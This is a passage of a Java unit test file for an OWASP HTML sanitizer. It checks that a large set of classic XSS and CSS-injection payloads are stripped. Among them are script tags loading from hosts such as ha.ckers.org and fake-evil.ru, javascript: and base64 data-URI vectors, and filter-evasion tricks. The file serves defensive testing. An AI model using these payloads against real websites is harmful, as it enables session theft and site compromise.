/* | |
* Copyright (c) 2007-2010, Arshan Dabirsiaghi, Jason Li | |
* | |
* All rights reserved. | |
* | |
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: | |
* | |
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. | |
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. | |
* Neither the name of OWASP nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. | |
* | |
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS | |
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT | |
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR | |
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR | |
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, | |
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, | |
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR | |
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF | |
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING | |
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS | |
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
*/ | |
package org.owasp.html; | |
import java.io.IOException; | |
import java.io.InputStreamReader; | |
import java.net.URL; | |
import java.net.URLConnection; | |
import java.util.regex.Matcher; | |
import java.util.regex.Pattern; | |
import org.apache.commons.codec.binary.Base64; | |
import junit.framework.AssertionFailedError; | |
import junit.framework.Test; | |
import junit.framework.TestCase; | |
import junit.framework.TestSuite; | |
/** | |
* This class tests AntiSamy functionality and the basic policy file which | |
* should be immune to XSS and CSS phishing attacks. | |
* | |
* @author Arshan Dabirsiaghi | |
* | |
*/ | |
public class AntiSamyTest extends TestCase { | |
static final boolean RUN_KNOWN_FAILURES = false; | |
static final boolean DISABLE_INTERNETS = false; | |
private static HtmlSanitizer.Policy makePolicy(Appendable buffer) { | |
final HtmlStreamRenderer renderer = HtmlStreamRenderer.create( | |
buffer, | |
new Handler<IOException>() { | |
public void handle(IOException ex) { | |
AssertionFailedError failure = new AssertionFailedError(); | |
failure.initCause(ex); | |
throw failure; | |
} | |
}, | |
new Handler<String>() { | |
public void handle(String errorMessage) { | |
fail(errorMessage); | |
} | |
}); | |
return new HtmlPolicyBuilder() | |
.allowElements( | |
"a", "b", "br", "div", "font", "i", "img", "input", "li", | |
"ol", "p", "span", "td", "ul") | |
.allowAttributes("checked", "type").onElements("input") | |
.allowAttributes("color").onElements("font") | |
.allowAttributes("href").onElements("a") | |
.allowAttributes("src").onElements("img") | |
.allowAttributes("class", "id", "title").globally() | |
.allowAttributes("char").matching( | |
new AttributePolicy() { | |
public String apply( | |
String elementName, String attributeName, String value) { | |
return value.length() == 1 ? value : null; | |
} | |
}).onElements("td") | |
.allowStandardUrlProtocols() | |
.requireRelNofollowOnLinks() | |
.allowStyling() | |
.build(renderer); | |
} | |
private static String sanitize(String html) { | |
StringBuilder sb = new StringBuilder(); | |
HtmlSanitizer.sanitize(html, makePolicy(sb)); | |
return sb.toString(); | |
} | |
private static final String[] BASE64_BAD_XML_STRINGS = new String[] { | |
// first string is | |
// "<a - href=\"http://www.owasp.org\">click here</a>" | |
"PGEgLSBocmVmPSJodHRwOi8vd3d3Lm93YXNwLm9yZyI+Y2xpY2sgaGVyZTwvYT4=", | |
// the rest are randomly generated 300 byte sequences which generate | |
// parser errors, turned into Strings | |
"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", | |
}; | |
@Override | |
protected void setUp() throws Exception { | |
super.setUp(); | |
} | |
@Override | |
protected void tearDown() throws Exception { | |
super.tearDown(); | |
} | |
public static Test suite() { | |
TestSuite suite = new TestSuite(AntiSamyTest.class); | |
return suite; | |
} | |
public void testCompareSpeeds() throws Exception { | |
if (DISABLE_INTERNETS) { return; } | |
long totalTime = 0; | |
long averageTime = 0; | |
int testReps = 15; | |
for (String url : new String[] { | |
"http://slashdot.org/", "http://www.fark.com/", | |
"http://www.cnn.com/", "http://google.com/", | |
"http://www.microsoft.com/en/us/default.aspx", | |
"http://deadspin.com/", | |
}) { | |
URLConnection conn = new URL(url).openConnection(); | |
String ct = guessCharsetFromContentType(conn.getContentType()); | |
InputStreamReader in = new InputStreamReader(conn.getInputStream(), ct); | |
StringBuilder out = new StringBuilder(); | |
char[] buffer = new char[5000]; | |
int read = 0; | |
do { | |
read = in.read(buffer, 0, buffer.length); | |
if (read > 0) { | |
out.append(buffer, 0, read); | |
} | |
} while (read >= 0); | |
in.close(); | |
String html = out.toString(); | |
System.out.println("About to scan: " + url + " size: " + html.length()); | |
if (html.length() > 640000) { | |
System.out.println(" -Maximum input size 640000 exceeded. SKIPPING."); | |
continue; | |
} | |
long startTime = 0; | |
long endTime = 0; | |
for (int j = 0; j < testReps; j++) { | |
startTime = System.nanoTime(); | |
sanitize(html); | |
endTime = System.nanoTime(); | |
System.out.println( | |
" Took " + ((endTime - startTime) / 1000000) + " ms"); | |
totalTime = totalTime + (endTime - startTime); | |
} | |
averageTime = totalTime / testReps; | |
} | |
System.out.println("Total time ms: " + totalTime/1000000L); | |
System.out.println("Average time per rep ms: " + averageTime/1000000L); | |
} | |
/* | |
* Test basic XSS cases. | |
*/ | |
public void testScriptAttacks() throws Exception { | |
assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script"); | |
assertSanitizedDoesNotContain("test<script>alert(document.cookie)</script>", "script"); | |
assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script"); | |
assertSanitizedDoesNotContain("<<<><<script src=http://fake-evil.ru/test.js>", "<script"); | |
assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script"); | |
assertSanitizedDoesNotContain("<script<script src=http://fake-evil.ru/test.js>>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload"); | |
assertSanitizedDoesNotContain("<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "onload"); | |
assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert"); | |
assertSanitizedDoesNotContain("<BODY ONLOAD=alert('XSS')>", "alert"); | |
assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe"); | |
assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe"); | |
assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src"); | |
assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src"); | |
assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert"); | |
assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert"); | |
} | |
public void testImgAttacks() throws Exception { | |
assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img"); | |
assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img"); | |
assertSanitizedDoesNotContain("<img src=javascript:alert(document.cookie)>", "<img"); | |
assertSanitizedDoesNotContain("<IMG SRC=javascript:alert('XSS')>", "<img"); | |
assertSanitizedDoesNotContain("<IMG SRC=javascript:alert('XSS')>", "<img"); | |
assertSanitizedDoesNotContain("<IMG SRC='javascript:alert('XSS')'>", "src"); | |
assertSanitizedDoesNotContain("<IMG SRC='javascript:alert('XSS')'>", "src"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"jav
ascript:alert('XSS');\">", "alert"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"jav
ascript:alert('XSS');\">", "alert"); | |
String s = "<IMG SRC=javascript:alert('XSS')>"; | |
if (sanitize(s).length() != 0) { | |
assertSanitizedDoesContain(s, "&"); | |
} | |
s = "<IMG SRC=javascript:alert('XSS')>"; | |
if (sanitize(s).length() != 0) { | |
assertSanitizedDoesContain(s, "&"); | |
} | |
sanitize("<IMG SRC=javascript:alert('XSS')>"); | |
sanitize("<IMG SRC=javascript:alert('XSS')>"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript"); | |
assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript"); | |
assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript"); | |
assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript"); | |
assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript"); | |
assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript"); | |
} | |
public void testHrefAttacks() throws Exception { | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href"); | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href"); | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href"); | |
assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href"); | |
assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org"); | |
assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript"); | |
assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript"); | |
assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript"); | |
assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta"); | |
assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta"); | |
assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe"); | |
assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe"); | |
assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript"); | |
assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript"); | |
assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert"); | |
assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert"); | |
assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert"); | |
assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert"); | |
assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert"); | |
assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert"); | |
assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript"); | |
assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript"); | |
assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base"); | |
assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base"); | |
assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object"); | |
assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object"); | |
assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript"); | |
assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script"); | |
assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script"); | |
assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script"); | |
assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script"); | |
assertSanitizedDoesNotContain("<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>", "style"); | |
assertSanitizedDoesNotContain("<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>", "style"); | |
assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe"); | |
assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe"); | |
assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript"); | |
assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript"); | |
assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document"); | |
assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document"); | |
} | |
/* | |
* Test CSS protections. | |
*/ | |
public void testCssAttacks() throws Exception { | |
assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position"); | |
assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position"); | |
assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position"); | |
assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position"); | |
assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index"); | |
assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index"); | |
assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index"); | |
assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index"); | |
} | |
/* | |
* Test a bunch of strings that have tweaked the XML parsing capabilities of | |
* NekoHTML. | |
*/ | |
public void testIllegalXML() throws Exception { | |
for (int i = 0; i < BASE64_BAD_XML_STRINGS.length; i++) { | |
